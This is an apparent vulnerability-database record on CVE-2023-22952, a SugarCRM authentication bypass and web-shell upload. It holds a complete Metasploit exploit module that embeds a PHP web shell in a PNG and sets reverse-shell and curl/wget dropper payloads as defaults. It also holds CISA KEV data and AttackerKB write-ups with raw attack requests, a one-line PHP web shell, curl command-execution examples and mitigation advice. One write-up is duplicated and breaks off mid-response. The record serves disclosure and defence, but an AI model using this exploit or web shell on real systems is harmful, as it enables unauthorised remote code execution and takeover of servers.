{"packetstorm": [{"lastseen": "2023-03-10T14:49:25", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-10T00:00:00", "type": "packetstorm", "title": "SugarCRM 12.x Remote Code Execution / Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2023-22952"], "modified": "2023-03-10T00:00:00", "id": "PACKETSTORM:171320", "href": "https://packetstormsecurity.com/files/171320/SugarCRM-12.x-Remote-Code-Execution-Shell-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'securerandom' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Format::PhpPayloadPng \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'SugarCRM unauthenticated Remote Code Execution (RCE)', \n'Description' => %q{ \nThis module exploits CVE-2023-22952, a Remote Code Execution (RCE) vulnerability in SugarCRM 11.0 Enterprise, \nProfessional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and \nServe versions prior to 12.0.2. \n \nThe vulnerability occurs due to a lack of appropriate validation when uploading a malicious PNG file with \nembedded PHP code to the /cache/images/ directory on the web server using the vulnerable endpoint \n/index.php?module=EmailTemplates&action=AttachFiles. Once uploaded to the server, depending on server configuration, \nthe attacker can access the malicious PNG file via HTTP or HTTPS, thereby executing the malicious PHP code and \ngaining access to the system. \n \nThis vulnerability does not require authentication because there is a missing authentication check in the \nloadUser() method in include/MVC/SugarApplication.php. After a failed login, the session does not get \ndestroyed and hence the attacker can continue to send valid requests to the application. \n \nBecause of this, any remote attacker, regardless of authentication, can exploit this vulnerability to gain \naccess to the underlying operating system as the user that the web services are running as (typically www-data). \n}, \n'Author' => [ \n'Sw33t.0day', # discovery \n'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module \n], \n'References' => [ \n[ 'CVE', '2023-22952' ], \n[ 'URL', 'https://seclists.org/fulldisclosure/2022/Dec/31' ], \n[ 'URL', 'https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/' ], \n[ 'URL', 'https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update' ], \n[ 'URL', 'https://attackerkb.com/topics/E486ui94II/cve-2023-22952' ], \n[ 'PACKETSTORM', '170346' ] \n], \n'License' => MSF_LICENSE, \n'Platform' => [ 'unix', 'linux', 'php' ], \n'Privileged' => false, \n'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ], \n'Targets' => [ \n[ \n'PHP', \n{ \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Type' => :php, \n'DefaultOptions' => { \n'PAYLOAD' => 'php/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ ARCH_X64, ARCH_X86 ], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2022-12-28', \n'DefaultOptions' => { \n'SSL' => false, \n'RPORT' => 80 \n}, \n'Notes' => { \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], \n'Reliability' => [ REPEATABLE_SESSION ] \n} \n) \n) \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, 'SugarCRM base url', '/' ]), \nOptString.new('WEBSHELL', [ \nfalse, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell name will be randomly generated if left unset.', '' \n]), \nOptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0]) \n] \n) \nend \n \ndef authenticate \n# generate PHP session-id \n@phpsessid = \"PHPSESSID=#{SecureRandom.uuid}\" \n \n# randomize user and password to obfuscate and make finger printing difficult. \nuser_name = Rex::Text.rand_name \nuser_password = Rex::Text.rand_text_alphanumeric(8..16) \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'), \n'cookie' => @phpsessid.to_s, \n'ctype' => 'application/x-www-form-urlencoded', \n'vars_post' => { \n'module' => 'Users', \n'action' => 'Authenticate', \n'user_name' => user_name.to_s, \n'user_password' => user_password.to_s \n} \n}) \nif res && res.code == 500 && !res.body.blank? \nreturn true \nelse \nreturn false \nend \nend \n \ndef upload_webshell \n# randomize file name and extension if option WEBSHELL is not set \nfile_ext = ['phar', 'phtml'] \nif datastore['WEBSHELL'].blank? \n@webshell_name = \"#{Rex::Text.rand_text_alpha(8..16)}.#{file_ext.sample}\" \nelse \n@webshell_name = datastore['WEBSHELL'].to_s \nend \n \n# select webshell depending on the target setting (PHP or others). \n@post_param = Rex::Text.rand_text_alphanumeric(1..8) \n@get_param = Rex::Text.rand_text_alphanumeric(1..8) \n \nif target['Type'] == :php \npayload = \"<?php @eval(base64_decode($_POST[\\'#{@post_param}\\']));?>\" \nelse \npayload = \"<?=$_GET[\\'#{@get_param}\\'](base64_decode($_POST[\\'#{@post_param}\\']));?>\" \nend \n \n# inject PHP payload into the PLTE chunk of the PNG image \npng_webshell = inject_php_payload_png(payload, injection_method: 'PLTE') \nif png_webshell.nil? \nreturn false \nend \n \n# construct multipart form data \nform_data = Rex::MIME::Message.new \nform_data.add_part('AttachFiles', nil, nil, 'form-data; name=\"action\"') \nform_data.add_part('EmailTemplates', nil, nil, 'form-data; name=\"module\"') \nform_data.add_part(png_webshell.to_s, 'image/png', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{@webshell_name}\\\"\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'), \n'cookie' => @phpsessid.to_s, \n'ctype' => \"multipart/form-data; boundary=#{form_data.bound}\", \n'data' => form_data.to_s \n}) \nif res && res.code == 200 && !res.body.blank? \n# parse HTML to find the webshell name embedded in a table that indicates a successful upload \nhtml = res.get_html_document \nif html.at(\"td[contains(\\\"#{@webshell_name}\\\")]\") \nreturn true \nelse \nreturn false \nend \nelse \nreturn false \nend \nend \n \ndef execute_php(cmd, _opts = {}) \npayload = Base64.strict_encode64(cmd) \nreturn send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name), \n'cookie' => @phpsessid.to_s, \n'ctype' => 'application/x-www-form-urlencoded', \n'vars_post' => { \n@post_param => payload \n} \n}) \nend \n \ndef execute_command(cmd, _opts = {}) \npayload = Base64.strict_encode64(cmd) \nphp_cmd_function = datastore['COMMAND'] \nreturn send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'cache', 'images', @webshell_name), \n'cookie' => @phpsessid.to_s, \n'ctype' => 'application/x-www-form-urlencoded', \n'vars_get' => { \n@get_param => php_cmd_function \n}, \n'vars_post' => { \n@post_param => payload \n} \n}) \nend \n \ndef exploit \nfail_with(Failure::NoAccess, 'Authentication bypass failed.') unless authenticate \nfail_with(Failure::NotVulnerable, \"Webshell #{@webshell_name} upload failed, the system is likely patched.\") unless upload_webshell \nregister_file_for_cleanup(@webshell_name.to_s) \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :php \nexecute_php(payload.encoded) \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager(linemax: 65536) \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/171320/sugarcrm_webshell_cve_2023_22952.rb.txt"}], "cisa_kev": [{"lastseen": "2023-07-23T23:26:18", "description": "Multiple SugarCRM products contain a remote code execution vulnerability in the EmailTemplates. Using a specially crafted request, custom PHP code can be injected through the EmailTemplates.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-02T00:00:00", "type": "cisa_kev", "title": "Multiple SugarCRM Products Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22952"], "modified": "2023-02-02T00:00:00", "id": "CISA-KEV-CVE-2023-22952", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-08-24T08:28:36", "description": "In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.\n\n \n**Recent assessments:** \n \n**h00die-gr3y** at January 18, 2023 8:56am UTC reported:\n\nLast December, 28th 2022, a zero.day vulnerability in the SugarCRM application was [disclosed](<https://seclists.org/fulldisclosure/2022/Dec/31>) by `sw33t.0day`. SugarCRM is a popular CRM application that is used by thousands of customers and the latest run of `shodan` shows more than **5600** instances active on the Internet. \nIt is fair to say that not all instances are vulnerable. There is a fast amount of SugarCRM Community Editions amongst them that are not affected by this vulnerability.\n\nFor the vulnerable versions, please check the security advisory [sugarcrm-sa-2023-001](<https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/>) from the vendor.\n\nThe vulnerability in sugarCRM could allow an unauthenticated attacker to upload a malicious PNG file with embedded PHP code to the `/cache/images/` directory on the web server. Once uploaded to the server, depending on server configuration, the attacker may be able to execute that code over the web via `HTTP` or `HTTPS` gaining access to the system.\n\nThe vulnerability is caused by two issues in the code base of sugarCRM.\n\nFirst issue is a missing authentication check in the `loadUser()` method in `include/MVC/SugarApplication.php`. \nAfter a failed login, the session does not get destroyed and hence the attacker can continue to send valid requests to the application. \nThe burp request below shows this behavior.\n\n**Authentication request and response from a vulnerable instance**\n \n \n POST /index.php HTTP/1.1\n Host: TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 72\n Connection: close\n \n module=Users&action=Authenticate&user_name=brenda&user_password=DbLiL98a\n \n\nResponse is a HTTP 500 message and the response says `You must specify a valid username and password.` Could be different depending on the language settings.\n \n \n HTTP/1.0 500 Server Error\n Date: Wed, 18 Jan 2023 05:54:58 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Set-Cookie: PHPSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; HttpOnly\n Status: 500 Server Error\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Content-Length: 47\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n You must specify a valid username and password.\n \n\nAfter applying the suggested fix below from the vendor, the session information gets destroyed after a failed login and further request will fail.\n \n \n //If there was a login error, we should not allow the further code execution and destroy the session\n \n if (isset($_SESSION['login_error'])) {\n \n if ($sess->getId()) {\n \n $sess->destroy();\n \n };\n \n header('Location: ' . $this->getUnauthenticatedHomeUrl(true));\n \n exit();\n \n }\n \n\nBurp response after the patch, where the response says `You need to be logged in to perform this action.`\n \n \n HTTP/1.0 500 Server Error\n Date: Tue, 17 Jan 2023 07:23:56 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=cf6361a9-6222-45f4-bcfb-08d0dc88376e; path=/\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Status: 500 Server Error\n Content-Length: 49\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n \n You need to be logged in to perform this action.\n \n\nThe second issue is around the ability to upload of a malicious PNG file with PHP code embedded that can be executed by the attacker. \nThe vulnerable endpoint is `/index.php?module=EmailTemplates&action=AttachFiles`\n\nThere is a good reference [Persistent PHP payloads in PNGs](<https://www.synacktiv.com/en/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html>) that explains very well how to build a malicious PNG file with PHP code embedded. \nThe are several ways to hide web shell code into a PNG to make the upload of such malicious PNG successful. \nIn this case, we will embed the web shell code into a so called PLTE chunk which stores the color palette code of a PNG. \nThis PLTE chunk is a critical chunk of data that does not get compressed when uploading a PNG which typically a lot of web applications do nowadays.\n\nThe PLTE chunk contains from 1 to 256 palette entries, each a three-byte series of the form:\n\n> Red: 1 byte (0 = black, 255 = red) \nGreen: 1 byte (0 = black, 255 = green) \nBlue: 1 byte (0 = black, 255 = blue)\n\nUsing the PLTE chunk, we potentially have 256*3 bytes available to inject our payload into such a critical chunk, which should be more than enough. The only constraint being that the length of the payload must be divisible by 3.\n\nOur main objective is to keep our web shell small and keep it flexible to accommodate large payloads to avoid the restrictions 768 bytes and the length of the payload. By using a PHP payload like `<?=$_GET[0](base64_decode($_POST[1]));?>`, it will satisfy those requirements where you externalize the actual payload to be delivered to the target and can modify the PHP shell command functions during runtime such as `exec()`, `passthru()`, `shell_exec()` and `system()`. \nSee `curl` examples below.\n \n \n # echo 'ls -l' | base64 \n bHMgLWwK\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=passthru' -o -\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=system' -o -\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=shell_exec' -o -\n \n\nThe burp requests below shows a success upload of the malicious PNG with PHP code embedded at a vulnerable target followed by a successful command injection.\n\n**Malicious PNG File upload**\n \n \n POST /index.php HTTP/1.1\n Host: TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Length: 601\n Connection: close\n \n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"action\"\n \n AttachFiles\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"module\"\n \n EmailTemplates\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"file\"; filename=\"yohoo.phar\"\n Content-Type: image/png\n \n PNG\n \n --Garbled binary text--<?=$_GET[0](base64_decode($_POST[1]));?>--Garbled binary text--\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR--\n \n\nSuccessful response of the upload will show the file entry at end of the response.\n \n \n HTTP/1.1 200 OK\n Date: Wed, 18 Jan 2023 05:55:00 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly\n Vary: Accept-Encoding\n Content-Length: 4460\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n <html lang='en_us'>\n <head>\n ---- A LOT of HTML CRAP ----\n <div id=\"main\">\n <div id=\"content\">\n <table style=\"width:100%\" id=\"contentTable\"><tr><td>\n [\"cache\\/images\\/yohoo.phar\"]\n \n\n**Command execution of `ls -l`**\n \n \n POST /cache/images/yohoo.phar?0=passthru HTTP/1.1\n Host:TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=06457e85-5a6c-4428-880a-8e5134137650\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 10\n Connection: close\n \n 1=bHMgLWwK\n \n\nRemote command execution response\n \n \n HTTP/1.1 200 OK\n Date: Mon, 16 Jan 2023 16:23:10 GMT\n Server: Apache/2.4.10 (Debian)\n Vary: Accept-Encoding\n Content-Length: 1209\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n PNG\n \n --Garbled binary text--total 76\n -rw-r--r-- 1 www-data www-data 207 Jan 16 14:38 yohoo.phar\n --Garbled binary text--\n \n\nYou can of course vary the 0 parameter with other PHP shell command functions such as `exec`, `shell_exec` or `system`.\n\n## Evidence of compromise\n\nWhen you want to check if your system is compromised, please look for unexpected files in the `/cache/images/` directory. The published [exploit](<https://packetstormsecurity.com/files/170346/SugarCRM-Shell-Upload.html>) had a filename `sweet.phar` that was not cleaned. However, attackers have changed these filenames such as `imagefile.phar`, `meow.phar`, `rvsm.phar`, `aws.phar`, and are using files with other extensions. \nAlso be conscious of the fact that the files might have been cleaned up by the attacker to cover their tracks.\n\nOther evidence might be failed execution request for files under the `/cache/images/` directory with the extension `php`, `phar`, `phtml`, `php7`, or any other executable extension **NOT** allowed by your web server configuration. The response codes can be found in your web server logs, such as `404` \u2013 the file was not found or `403` \u2013 the access was denied by web server.\n\n## Mitigation\n\nPlease follow the guidelines from the vendor to patch your system [January 5, 2023: Security vulnerability update and FAQ](<https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update>) or configure additional security settings in your web server such as preventing PHP code parsing/execution using `.htaccess setting` file in `/cache/images/` directory and/or prevent PHP code execution by updating security settings in the `php.ini` file. Lots of security guidance is available on the Internet. \nAnother less obvious security measure to consider is to enable `SAML` authentication that will mitigate the authentication bypass issue, hence will protect you against unauthenticated malicious file uploads.\n\nI have created a `Metasploit` module to test this vulnerability. A local version of this module can found at the **References** section. \n[Submission](<https://github.com/rapid7/metasploit-framework/pull/17507>) to Metasploit mainstream is completed and module is in production.\n\n## References\n\n[Full Disclosure](<https://seclists.org/fulldisclosure/2022/Dec/31>) \n[Public Exploit \u2013 Packetstorm](<https://packetstormsecurity.com/files/170346/SugarCRM-Shell-Upload.html>) \n[Security Advisory \u2013 sugarcrm-sa-2023-001](<https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/>) \n[January 5, 2023: Security vulnerability update and FAQ](<https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update>) \n[Encoding web shells in PNG IDAT chunks](<https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/>) \n[Persistent PHP payloads in PNGs](<https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html>) \n[Metasploit Development h00die-gr3y](<https://github.com/h00die-gr3y/Metasploit/blob/main/README.md>)\n\n### Credits\n\nCredits goes to `sw33t.0day` below who discovered this vulnerability.\n\n**rbowes-r7** at January 11, 2023 9:25pm UTC reported:\n\nLast December, 28th 2022, a zero.day vulnerability in the SugarCRM application was [disclosed](<https://seclists.org/fulldisclosure/2022/Dec/31>) by `sw33t.0day`. SugarCRM is a popular CRM application that is used by thousands of customers and the latest run of `shodan` shows more than **5600** instances active on the Internet. \nIt is fair to say that not all instances are vulnerable. There is a fast amount of SugarCRM Community Editions amongst them that are not affected by this vulnerability.\n\nFor the vulnerable versions, please check the security advisory [sugarcrm-sa-2023-001](<https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/>) from the vendor.\n\nThe vulnerability in sugarCRM could allow an unauthenticated attacker to upload a malicious PNG file with embedded PHP code to the `/cache/images/` directory on the web server. Once uploaded to the server, depending on server configuration, the attacker may be able to execute that code over the web via `HTTP` or `HTTPS` gaining access to the system.\n\nThe vulnerability is caused by two issues in the code base of sugarCRM.\n\nFirst issue is a missing authentication check in the `loadUser()` method in `include/MVC/SugarApplication.php`. \nAfter a failed login, the session does not get destroyed and hence the attacker can continue to send valid requests to the application. \nThe burp request below shows this behavior.\n\n**Authentication request and response from a vulnerable instance**\n \n \n POST /index.php HTTP/1.1\n Host: TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 72\n Connection: close\n \n module=Users&action=Authenticate&user_name=brenda&user_password=DbLiL98a\n \n\nResponse is a HTTP 500 message and the response says `You must specify a valid username and password.` Could be different depending on the language settings.\n \n \n HTTP/1.0 500 Server Error\n Date: Wed, 18 Jan 2023 05:54:58 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Set-Cookie: PHPSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; HttpOnly\n Status: 500 Server Error\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly;\n Content-Length: 47\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n You must specify a valid username and password.\n \n\nAfter applying the suggested fix below from the vendor, the session information gets destroyed after a failed login and further request will fail.\n \n \n //If there was a login error, we should not allow the further code execution and destroy the session\n \n if (isset($_SESSION['login_error'])) {\n \n if ($sess->getId()) {\n \n $sess->destroy();\n \n };\n \n header('Location: ' . $this->getUnauthenticatedHomeUrl(true));\n \n exit();\n \n }\n \n\nBurp response after the patch, where the response says `You need to be logged in to perform this action.`\n \n \n HTTP/1.0 500 Server Error\n Date: Tue, 17 Jan 2023 07:23:56 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=cf6361a9-6222-45f4-bcfb-08d0dc88376e; path=/\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/\n Status: 500 Server Error\n Content-Length: 49\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n \n You need to be logged in to perform this action.\n \n\nThe second issue is around the ability to upload of a malicious PNG file with PHP code embedded that can be executed by the attacker. \nThe vulnerable endpoint is `/index.php?module=EmailTemplates&action=AttachFiles`\n\nThere is a good reference [Persistent PHP payloads in PNGs](<https://www.synacktiv.com/en/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html>) that explains very well how to build a malicious PNG file with PHP code embedded. \nThe are several ways to hide web shell code into a PNG to make the upload of such malicious PNG successful. \nIn this case, we will embed the web shell code into a so called PLTE chunk which stores the color palette code of a PNG. \nThis PLTE chunk is a critical chunk of data that does not get compressed when uploading a PNG which typically a lot of web applications do nowadays.\n\nThe PLTE chunk contains from 1 to 256 palette entries, each a three-byte series of the form:\n\n> Red: 1 byte (0 = black, 255 = red) \nGreen: 1 byte (0 = black, 255 = green) \nBlue: 1 byte (0 = black, 255 = blue)\n\nUsing the PLTE chunk, we potentially have 256*3 bytes available to inject our payload into such a critical chunk, which should be more than enough. The only constraint being that the length of the payload must be divisible by 3.\n\nOur main objective is to keep our web shell small and keep it flexible to accommodate large payloads to avoid the restrictions 768 bytes and the length of the payload. By using a PHP payload like `<?=$_GET[0](base64_decode($_POST[1]));?>`, it will satisfy those requirements where you externalize the actual payload to be delivered to the target and can modify the PHP shell command functions during runtime such as `exec()`, `passthru()`, `shell_exec()` and `system()`. \nSee `curl` examples below.\n \n \n # echo 'ls -l' | base64 \n bHMgLWwK\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=passthru' -o -\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=system' -o -\n # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/yohoo.phar?0=shell_exec' -o -\n \n\nThe burp requests below shows a success upload of the malicious PNG with PHP code embedded at a vulnerable target followed by a successful command injection.\n\n**Malicious PNG File upload**\n \n \n POST /index.php HTTP/1.1\n Host: TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Length: 601\n Connection: close\n \n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"action\"\n \n AttachFiles\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"module\"\n \n EmailTemplates\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR\n Content-Disposition: form-data; name=\"file\"; filename=\"yohoo.phar\"\n Content-Type: image/png\n \n PNG\n \n --Garbled binary text--<?=$_GET[0](base64_decode($_POST[1]));?>--Garbled binary text--\n ------WebKitFormBoundaryWeTJtA8WByYIQMGR--\n \n\nSuccessful response of the upload will show the file entry at end of the response.\n \n \n HTTP/1.1 200 OK\n Date: Wed, 18 Jan 2023 05:55:00 GMT\n Server: Apache/2.4.10 (Debian)\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly\n Expires: Thu, 19 Nov 1981 08:52:00 GMT\n Cache-Control: no-store, no-cache, must-revalidate\n Pragma: no-cache\n Set-Cookie: PHPSESSID=c09b717d-9ff8-42ec-a2fb-1ad3edfab4c5; path=/; HttpOnly\n Vary: Accept-Encoding\n Content-Length: 4460\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n <html lang='en_us'>\n <head>\n ---- A LOT of HTML CRAP ----\n <div id=\"main\">\n <div id=\"content\">\n <table style=\"width:100%\" id=\"contentTable\"><tr><td>\n [\"cache\\/images\\/yohoo.phar\"]\n \n\n**Command execution of `ls -l`**\n \n \n POST /cache/images/yohoo.phar?0=passthru HTTP/1.1\n Host:TARGET:80\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15\n Cookie: PHPSESSID=06457e85-5a6c-4428-880a-8e5134137650\n Content-Type: application/x-www-form-urlencoded\n Content-Length: 10\n Connection: close\n \n 1=bHMgLWwK\n \n\nRemote command execution response\n \n \n HTTP/1.1 200 OK\n Date: Mon, 16 Jan 2023 16:23:10 GMT\n Server: Apache/2.4.10 (Debian)\n Vary: Accept-Encoding\n Content-Length: 1209\n Connection: close\n Content-Type: text/html; charset=UTF-8\n \n PNG\n \n --Garbled binary text--total 76\n -rw-r--r-- 1 www-data www-data 207 Jan 16 14:38 